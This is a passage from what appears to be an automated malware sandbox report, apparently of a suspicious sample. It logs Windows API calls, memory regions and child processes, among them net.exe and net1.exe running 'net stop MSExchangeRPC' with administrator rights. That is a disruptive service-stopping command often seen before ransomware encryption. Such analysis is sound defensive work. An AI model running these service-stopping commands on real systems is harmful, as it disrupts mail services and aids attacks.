SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0139.565] GetEnvironmentStringsW () returned 0x4759ec8* [0139.565] FreeEnvironmentStringsA (penv="=") returned 1 [0139.565] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0139.687] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x465f4cc | out: lpExitCode=0x465f4cc*=0x2) returned 1 [0139.688] CloseHandle (hObject=0xa8) returned 1 [0139.688] _vsnwprintf (in: _Buffer=0x465f5b4, _BufferCount=0x13, _Format="%08X", _ArgList=0x465f4d4 | out: _Buffer="00000002") returned 8 [0139.688] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0139.688] GetEnvironmentStringsW () returned 0x475b3a8* [0139.688] FreeEnvironmentStringsA (penv="=") returned 1 [0139.688] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0139.688] GetEnvironmentStringsW () returned 0x475b3a8* [0139.688] FreeEnvironmentStringsA (penv="=") returned 1 [0139.688] DeleteProcThreadAttributeList (in: lpAttributeList=0x465f560 | out: lpAttributeList=0x465f560) [0139.688] _get_osfhandle (_FileHandle=1) returned 0x3c [0139.688] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0139.688] _get_osfhandle (_FileHandle=1) returned 0x3c [0139.688] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0139.689] _get_osfhandle (_FileHandle=0) returned 0x38 [0139.689] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0139.689] SetConsoleInputExeNameW () returned 0x1 [0139.689] GetConsoleOutputCP () returned 0x1b5 [0139.689] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0139.689] SetThreadUILanguage (LangId=0x0) returned 0x409 [0139.689] exit (_Code=2) Thread: id = 717 os_tid = 0x554 Process: id = "242" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x2a0f5000" os_pid = "0xe50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "241" os_parent_pid = "0xc9c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11675 start_va = 0x7f019000 end_va = 0x7f019fff entry_point = 0x0 region_type = private name = "private_0x000000007f019000" filename = "" Region: id = 11676 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11677 start_va = 0xa1eeb50000 end_va = 0xa1eeb6ffff entry_point = 0x0 region_type = private name = "private_0x000000a1eeb50000" filename = "" Region: id = 11678 start_va = 0xa1eeb70000 end_va = 0xa1eeb83fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a1eeb70000" filename = "" Region: id = 11679 start_va = 0xa1eeb90000 end_va = 0xa1eebcffff entry_point = 0x0 region_type = private name = "private_0x000000a1eeb90000" filename = "" Region: id = 11680 start_va = 0x7df5ffd20000 end_va = 0x7ff5ffd1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffd20000" filename = "" Region: id = 11681 start_va = 0x7ff6c4540000 end_va = 0x7ff6c4562fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4540000" filename = "" Region: id = 11682 start_va = 0x7ff6c4564000 end_va = 0x7ff6c4564fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4564000" filename = "" Region: id = 11683 start_va = 0x7ff6c456e000 end_va = 0x7ff6c456ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c456e000" filename = "" Region: id = 11684 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 11685 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11686 start_va = 0xa1eeb50000 end_va = 0xa1eeb5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a1eeb50000" filename = "" Region: id = 11687 start_va = 0xa1eeb60000 end_va = 0xa1eeb66fff entry_point = 0x0 region_type = private name = "private_0x000000a1eeb60000" filename = "" Region: id = 11688 start_va = 0xa1eebd0000 end_va = 0xa1eec0ffff entry_point = 0x0 region_type = private name = "private_0x000000a1eebd0000" filename = "" Region: id = 11689 start_va = 0xa1eec10000 end_va = 0xa1eec10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a1eec10000" filename = "" Region: id = 11690 start_va = 0xa1eec20000 end_va = 0xa1eec26fff entry_point = 0x0 region_type = private name = "private_0x000000a1eec20000" filename = "" Region: id = 11691 start_va = 0xa1eec30000 end_va = 0xa1eec30fff entry_point = 0x0 region_type = private name = "private_0x000000a1eec30000" filename = "" Region: id = 11692 start_va = 0xa1eec40000 end_va = 0xa1eec40fff entry_point = 0x0 region_type = private name = "private_0x000000a1eec40000" filename = "" Region: id = 11693 start_va = 0xa1eec50000 end_va = 0xa1eec5ffff entry_point = 0x0 region_type = private name = "private_0x000000a1eec50000" filename = "" Region: id = 11694 start_va = 0xa1eec80000 end_va = 0xa1eed7ffff entry_point = 0x0 region_type = private name = "private_0x000000a1eec80000" filename = "" Region: id = 11695 start_va = 0xa1eed80000 end_va = 0xa1eee3dfff entry_point = 0xa1eed80000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11696 start_va = 0xa1eee40000 end_va = 0xa1eefc7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a1eee40000" filename = "" Region: id = 11697 start_va = 0xa1eefd0000 end_va = 0xa1ef150fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a1eefd0000" filename = "" Region: id = 11698 start_va = 0xa1ef160000 end_va = 0xa1f055ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a1ef160000" filename = "" Region: id = 11699 start_va = 0x7ff6c4440000 end_va = 0x7ff6c453ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4440000" filename = "" Region: id = 11700 start_va = 0x7ff6c456c000 end_va = 0x7ff6c456dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c456c000" filename = "" Region: id = 11701 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 11702 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 11703 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11704 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 11705 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 11706 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11707 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 11708 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11709 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11710 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 11711 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 11712 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 11713 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 11714 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 714 os_tid = 0xc98 Thread: id = 715 os_tid = 0xc8c Thread: id = 716 os_tid = 0xe54 Process: id = "243" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x14ab1000" os_pid = "0x9a4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "241" os_parent_pid = "0xc9c" cmd_line = "net stop MSExchangeRPC" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11728 start_va = 0x220000 end_va = 0x239fff entry_point = 0x220000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\SysWOW64\\net.exe" (normalized: "c:\\windows\\syswow64\\net.exe") Region: id = 11729 start_va = 0x2e0000 end_va = 0x42dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 11730 start_va = 0x42e0000 end_va = 0x42fffff entry_point = 0x0 region_type = private name = "private_0x00000000042e0000" filename = "" Region: id = 11731 start_va = 0x4300000 end_va = 0x4301fff entry_point = 0x0 region_type = private name = "private_0x0000000004300000" filename = "" Region: id = 11732 start_va = 0x4310000 end_va = 0x4323fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004310000" filename = "" Region: id = 11733 start_va = 0x4330000 end_va = 0x436ffff entry_point = 0x0 region_type = private name = "private_0x0000000004330000" filename = "" Region: id = 11734 start_va = 0x4370000 end_va = 0x43effff entry_point = 0x0 region_type = private name = "private_0x0000000004370000" filename = "" Region: id = 11735 start_va = 0x43f0000 end_va = 0x43f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000043f0000" filename = "" Region: id = 11736 start_va = 0x4400000 end_va = 0x4400fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004400000" filename = "" Region: id = 11737 start_va = 0x4410000 end_va = 0x4411fff entry_point = 0x0 region_type = private name = "private_0x0000000004410000" filename = "" Region: id = 11738 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 11739 start_va = 0x7ec80000 end_va = 0x7eca2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ec80000" filename = "" Region: id = 11740 start_va = 0x7eca7000 end_va = 0x7eca7fff entry_point = 0x0 region_type = private name = "private_0x000000007eca7000" filename = "" Region: id = 11741 start_va = 0x7ecaa000 end_va = 0x7ecacfff entry_point = 0x0 region_type = private name = "private_0x000000007ecaa000" filename = "" Region: id = 11742 start_va = 0x7ecad000 end_va = 0x7ecadfff entry_point = 0x0 region_type = private name = "private_0x000000007ecad000" filename = "" Region: id = 11743 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11744 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 11745 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 11746 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11747 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 11748 start_va = 0x4590000 end_va = 0x459ffff entry_point = 0x0 region_type = private name = "private_0x0000000004590000" filename = "" Region: id = 11749 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 11750 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 11751 start_va = 0x4760000 end_va = 0x485ffff entry_point = 0x0 region_type = private name = "private_0x0000000004760000" filename = "" Region: id = 11752 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Thread: id = 718 os_tid = 0xc80 Thread: id = 719 os_tid = 0xc3c Process: id = "244" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x151e2000" os_pid = "0x390" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "243" os_parent_pid = "0x9a4" cmd_line = "C:\\Windows\\system32\\net1 stop MSExchangeRPC" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11753 start_va = 0xa50000 end_va = 0xa6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 11754 start_va = 0xa70000 end_va = 0xa71fff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 11755 start_va = 0xa80000 end_va = 0xa93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a80000" filename = "" Region: id = 11756 start_va = 0xaa0000 end_va = 0xadffff entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 11757 start_va = 0xae0000 end_va = 0xb5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ae0000" filename = "" Region: id = 11758 start_va = 0xb60000 end_va = 0xb63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b60000" filename = "" Region: id = 11759 start_va = 0xb70000 end_va = 0xb70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b70000" filename = "" Region: id = 11760 start_va = 0xb80000 end_va = 0xb81fff entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 11761 start_va = 0x1080000 end_va = 0x10b1fff entry_point = 0x1080000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe") Region: id = 11762 start_va = 0x10c0000 end_va = 0x50bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010c0000" filename = "" Region: id = 11763 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 11764 start_va = 0x7e6b0000 end_va = 0x7e6d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e6b0000" filename = "" Region: id = 11765 start_va = 0x7e6d3000 end_va = 0x7e6d3fff entry_point = 0x0 region_type = private name = "private_0x000000007e6d3000" filename = "" Region: id = 11766 start_va = 0x7e6da000 end_va = 0x7e6dcfff entry_point = 0x0 region_type = private name = "private_0x000000007e6da000" filename = "" Region: id = 11767 start_va = 0x7e6dd000 end_va = 0x7e6ddfff entry_point = 0x0 region_type = private name = "private_0x000000007e6dd000" filename = "" Region: id = 11768 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11769 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 11770 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 11771 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11772 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 11773 start_va = 0xc90000 end_va = 0xc9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c90000" filename = "" Region: id = 11774 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 11775 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 11776 start_va = 0xe80000 end_va = 0xf7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 11777 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 11778 start_va = 0xa50000 end_va = 0xa5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a50000" filename = "" Region: id = 11779 start_va = 0xa60000 end_va = 0xa63fff entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 11780 start_va = 0xb90000 end_va = 0xc4dfff entry_point = 0xb90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11781 start_va = 0xc50000 end_va = 0xc8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 11782 start_va = 0xca0000 end_va = 0xd1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 11783 start_va = 0x5220000 end_va = 0x522ffff entry_point = 0x0 region_type = private name = "private_0x0000000005220000" filename = "" Region: id = 11784 start_va = 0x74a00000 end_va = 0x74a2efff entry_point = 0x74a00000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll") Region: id = 11785 start_va = 0x74a30000 end_va = 0x74a37fff entry_point = 0x74a30000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll") Region: id = 11786 start_va = 0x74a40000 end_va = 0x74a4efff entry_point = 0x74a40000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 11787 start_va = 0x74a50000 end_va = 0x74a63fff entry_point = 0x74a50000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 11788 start_va = 0x74ac0000 end_va = 0x74ac9fff entry_point = 0x74ac0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 11789 start_va = 0x74ad0000 end_va = 0x74aebfff entry_point = 0x74ad0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 11790 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 11791 start_va = 0x74b10000 end_va = 0x74b1ffff entry_point = 0x74b10000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 11792 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 11793 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 11794 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 11795 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 11796 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 11797 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 11798 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 11799 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 11800 start_va = 0x7e5b0000 end_va = 0x7e6affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e5b0000" filename = "" Region: id = 11801 start_va = 0x7e6d7000 end_va = 0x7e6d9fff entry_point = 0x0 region_type = private name = "private_0x000000007e6d7000" filename = "" Region: id = 11802 start_va = 0xa70000 end_va = 0xa73fff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 11803 start_va = 0xd20000 end_va = 0xd22fff entry_point = 0xd20000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\SysWOW64\\netmsg.dll" (normalized: "c:\\windows\\syswow64\\netmsg.dll") Region: id = 11804 start_va = 0xd30000 end_va = 0xd61fff entry_point = 0xd30000 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\netmsg.dll.mui") Thread: id = 720 os_tid = 0xc44 [0139.664] GetModuleHandleA (lpModuleName=0x0) returned 0x1080000 [0139.664] __set_app_type (_Type=0x1) [0139.664] __p__fmode () returned 0x77ac4d6c [0139.664] __p__commode () returned 0x77ac5b1c [0139.664] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1087020) returned 0x0 [0139.664] __getmainargs (in: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690, _DoWildCard=0, _StartInfo=0x109f69c | out: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690) returned 0 [0139.665] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0139.665] GetConsoleOutputCP () returned 0x1b5 [0139.665] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x10a7020 | out: lpCPInfo=0x10a7020) returned 1 [0139.665] SetThreadUILanguage (LangId=0x0) returned 0x409 [0139.667] sprintf_s (in: _DstBuf=0xb5faf4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0139.667] setlocale (category=0, locale=".437") returned="English_United States.437" [0139.668] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0139.668] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0139.668] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeRPC" [0139.668] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xb5f89c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0139.668] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xb5f890 | out: Buffer=0xb5f890*=0xe87fe0) returned 0x0 [0139.668] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xb5f894 | out: Buffer=0xb5f894*=0xe87ff8) returned 0x0 [0139.668] __iob_func () returned 0x77ac1208 [0139.668] _fileno (_File=0x77ac1208) returned 0 [0139.668] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0139.668] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0139.668] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0139.668] _wcsicmp (_String1="config", _String2="stop") returned -16 [0139.668] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0139.668] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0139.669] _wcsicmp (_String1="file", _String2="stop") returned -13 [0139.669] _wcsicmp (_String1="files", _String2="stop") returned -13 [0139.669] _wcsicmp (_String1="group", _String2="stop") returned -12 [0139.669] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0139.669] _wcsicmp (_String1="help", _String2="stop") returned -11 [0139.669] 